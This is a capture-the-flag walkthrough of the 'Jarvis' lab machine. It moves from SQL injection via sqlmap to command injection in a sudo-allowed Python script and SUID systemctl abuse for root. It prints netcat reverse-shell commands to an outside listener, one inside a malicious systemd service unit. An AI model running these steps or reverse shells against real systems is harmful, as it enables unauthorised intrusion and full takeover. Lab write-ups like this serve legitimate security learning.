My Attempt

Enumeration

From the Nmap scan, there are only 3 ports open.

Visiting port 80 through Firefox gives me a hotel webpage. After some manual enumeration, I found an interesting page "/rooms-suites.php".

By clicking the "Book now!" button, I was redirected to the "room.php" page. Looking at the URL, it seems that the page is using some query to retrieve the room information.

By changing the parameter to "cod=2" manually, the page shows another room.

This query seems to be susceptible to SQL injection. To check if I am correct, I tried to send set the cod value to ' (single quote). The page seems to have crashed from this, which proves that it is susceptible to SQL injection.

Using SQLmap

I used SQLmap to first check if the parameter cod is vulnerable using the following command.

sqlmap -u http://10.10.10.143/room.php?cod=1 -p 'cod' --level=3

The result shows that it is indeed vulnerable.

So I added the "--os-shell" command into the previous SQLmap command to get an OS shell. Now I am able to execute arbitrary system commands.

Full Reverse Shell

To get a fully functional shell, I issued a reverse shell command using netcat.

And now I have a shell as the user "www-data".

Privilege Escalation to Pepper

Using "sudo -l" on the shell gives the following result.

From this shell I can execute the simple.py code as the user pepper. Looking into the code, I found an interesting part that might lead to code execution as pepper.

When using the -p option, the user can input the ip address and it will be appended with the ping command and executed through os.system(). This means that we can try to provide another command as input to the program to get code execution as pepper. But in the exec_ping() function, the input goes through a check for forbidden characters.

These characters are typical for appending another command after the intended one. From here I was not sure how to evade such check and have to read the writeup.

Following Writeup

According to the writeup, the metioned simpler.py script allows the '$', '(' and ')' characters which can be used for code execution. The format "$(<command>)" is the bash syntax to run a command. First I will create a simple bash script to execute a reverse shell using netcat.

echo 'nc -nv 10.10.14.9 443 -e /bin/bash' > /tmp/shell.sh
chmod +x /tmp/shell.sh

Now I will run the simpler.py script with the -p options to run the ping command. For the user input, I will use the bash syntax to execute the bash script created in the previous step (/tmp/shell.sh).

With another listener set on my kali machine, I obtained a shell as the user "pepper".

The user.txt file can be found in the home directory of "pepper".

Root.txt

By checking file with SUID flag set, I found that the systemctl command has SUID set.

Looking up the command on GTFO bins, it seems that it is possible to create a service and to run commands as the root user.

The example given in GTFO bins simple writes the command output of "id" into "/tmp/output". I have modified the service creation process as follow. This service will issue a reverse shell using netcat.

echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "nc -nv 10.10.14.9 1337 -e /bin/bash"
[Install]
WantedBy=multi-user.target' > shell.service

Then I will follow the remaining steps to execute the reverse shell code.

systemctl link /home/pepper/shell.service
systemctl enable --now /home/pepper/shell.service

Again with another listener set on my kali machine, I obtained a shell as root.

PreviousJarvis NextLessons Learned

Last updated 3 years ago